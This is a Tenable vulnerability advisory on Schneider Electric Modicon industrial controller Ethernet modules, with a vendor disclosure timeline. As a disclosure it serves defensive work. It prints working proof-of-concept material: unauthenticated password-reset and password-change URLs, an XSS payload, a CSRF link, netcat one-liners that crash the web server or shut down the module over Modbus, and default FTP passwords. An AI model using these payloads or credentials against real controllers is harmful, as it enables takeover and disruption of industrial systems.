Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

[R1] Multiple Schneider Electric Modicon Quantum Vulnerabilities

Critical

Synopsis

Tenable found multiple vulnerabilities in the Schneider Electric Quantum Modicon 140 NOC 771 01 Ethernet Module.

CVE-2018-7809: Unauthenticated Password Reset

An unauthenticated remote attacker can delete the existing username and password for the HTTP server by visiting the following URL:

http://[ip]/unsecure/embedded/builtin?submit=Delete%20Password

This also has the side affect of resetting the web server username and password to the default USER/USER.

CVE-2018-7810: Reflected XSS

A reflected XSS vulnerability exists in the HTTP server's endpoint /goform/formTest. A remote attacker can insert Javascript into the name parameter that will be executed in the context of the person who followed the link. An example follows:

http://[ip]/goform/formTest?name=<script>alert()</script>

CVE-2018-7811: Unauthenticated Password Change

The web server allows an authenticated remote user to change their password via the /secure/embedded/builtin endpoint. The web server also lets an unauthenticated remote attacker change user's passwords via the /unsecure/embedded/builtin endpoint. An example URL that changes the admin user's password to evilpass follows:

http://[ip]/unsecure/embedded/builtin?Language=English&user=admin&passwd=evilpass&cnfpasswd=evilpass&subhttppwd=Save+User

CVE-2018-7830: Unauthenticated Remote Denial of Service

A denial of service occurs when an unauthenticated remote attacker sends an HTTP request with no "\r\n\r\n" terminator. This will render the web server useless for ~1 minute The following is a one line proof of concept:

echo -e "GET /index.htm HTTP/1.1\r\nHost: 192.168.248.30" | nc 192.168.248.30 80

CVE-2018-7831: Cross-site request forgery

The password change functionality is implemented with an HTTP GET request in which the new password is specified. An anti-forgery token is not required to validate the request. Furthermore, the current password does not need to be specified in order to complete a password change. An attacker can forge a link to be sent to an authenticated victim. Once clicked, the password will be changed. Example URL:

http://[ip]/secure/embedded/builtin?Language=English&user=admin&passwd=evilpass&cnfpasswd=evilpass&subhttppwd=Save+User

Others

Tenable reported seven vulnerabilities to Schneider Electric. Schneider indicated one of our vulnerabilities (default accounts) was a duplicate and the other (modbus denial of service) was not a vulnerability. However, we've decided to document them here.

Default FTP Accounts

We found a handful of default FTP accounts. Some passwords we used required use of a VxHash collision disclosed by H.D. Moore in 2010.

UsernamePassword
sysdiagfactorycast@schneider
fdruserssresurdf
fwupgradeFaAmU5p2F~
lokiZfTljublsx
Modbus Denial of Service

Modbus is accessible over TCP port 502. Tenable found that the following unauthenticated remote Modbus message will completely shutdown the Ethernet module:

echo -ne "\x0\xa8\x0\x0\x0\x5\x0\x5a\x0\x7\x0" | nc 192.168.238.30 502

Solution

No patches for these vulnerabilities exist. However, in their advisory, Schneider Electric advises customers to follow their Modicon Controllers Platform Cyber Security Reference Manual. They also recommend customers configure access control lists and "protect Modicon products with network, industrial, and application firewalls."

Disclosure Timeline

08/26/2018 - 7 Issues Discovered
08/27/2018 - Schneider Electric informed by encrypted email. 90 day date is November 26, 2018.
08/30/2018 - Schneider informs Tenable that the disclosure has been forwarded internally. Schneider provides a new point of contact.
09/04/2018 - Tenable asks the new contact if they received the forwarded email.
09/07/2018 - Schneider confirms receipt and indicates the team is still assessing the disclosure.
09/20/2018 - Tenable asks for an update.
09/20/2018 - Schneider has no update yet.
09/26/2018 - Tenable asks for an update.
09/26/2018 - Schneider has no update yet.
09/28/2018 - Schneider confirms all vulnerabilities. However, the team hasn't confirmed if any of the vulnerabilities are duplicates yet.
10/12/2018 - Tenable asks for an update. Remind Schneider that 45 days remain.
10/12/2018 - Schneider indicates they'll know more soon.
10/23/2018 - Tenable asks for an update.
10/24/2018 - Schneider confirms 5 new vulnerabilities. Flags one as a duplicate and one as not impacted.
10/24/2018 - Tenable asks Schneider to assign CVE.
10/24/2018 - Schneider acknowledges.
11/19/2018 - Tenable reminds Schneider of the upcoming disclosure date.
11/20/2018 - Schnieder indicates they'll have the bulletin for Tenable to review shortly.
11/21/2018 - Schnieder provides 5 CVE.
11/23/2018 - Schneider releases their advisory.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

Tenable Advisory ID: TRA-2018-38
Credit:
Jacob Baines
Anthony Bettini
Joseph Bingham
Chris Lyne
David Wells
CVSSv2 Base / Temporal Score:
9.7 / 9.7
CVSSv2 Vector:
AV:N/AC:L/Au:N/C:P/I:C/A:C
Nessus Plugin ID: 119147
Affected Products:
Modicon M340
Modicon Premium
Modicon Quantum
Modicon BMXNOR0200
Risk Factor:
Critical

Advisory Timeline

11/21/2018 - [R1] Initial Release

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable Vulnerability Management trial also includes Tenable Lumin and Tenable Web App Scanning.

Tenable Vulnerability Management

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

100 assets

Choose Your Subscription Option:

Buy Now

Try Tenable Web App Scanning

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable One Exposure Management platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. Sign up now.

Your Tenable Web App Scanning trial also includes Tenable Vulnerability Management and Tenable Lumin.

Buy Tenable Web App Scanning

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. Purchase your annual subscription today.

5 FQDNs

$3,578

Buy Now

Try Tenable Lumin

Visualize and explore your exposure management, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable Vulnerability Management and Tenable Web App Scanning.

Buy Tenable Lumin

Contact a Sales Representative to see how Tenable Lumin can help you gain insight across your entire organization and manage cyber risk.

Try Tenable Nessus Professional Free

FREE FOR 7 DAYS

Tenable Nessus is the most comprehensive vulnerability scanner on the market today.

NEW - Tenable Nessus Expert
Now Available

Nessus Expert adds even more features, including external attack surface scanning, and the ability to add domains and scan cloud infrastructure. Click here to Try Nessus Expert.

Fill out the form below to continue with a Nessus Pro Trial.

Buy Tenable Nessus Professional

Tenable Nessus is the most comprehensive vulnerability scanner on the market today. Tenable Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Select Your License

Buy a multi-year license and save.

Add Support and Training

Try Tenable Nessus Expert Free

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Already have Tenable Nessus Professional?
Upgrade to Nessus Expert free for 7 days.

Buy Tenable Nessus Expert

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Select Your License

Buy a multi-year license and save more.

Add Support and Training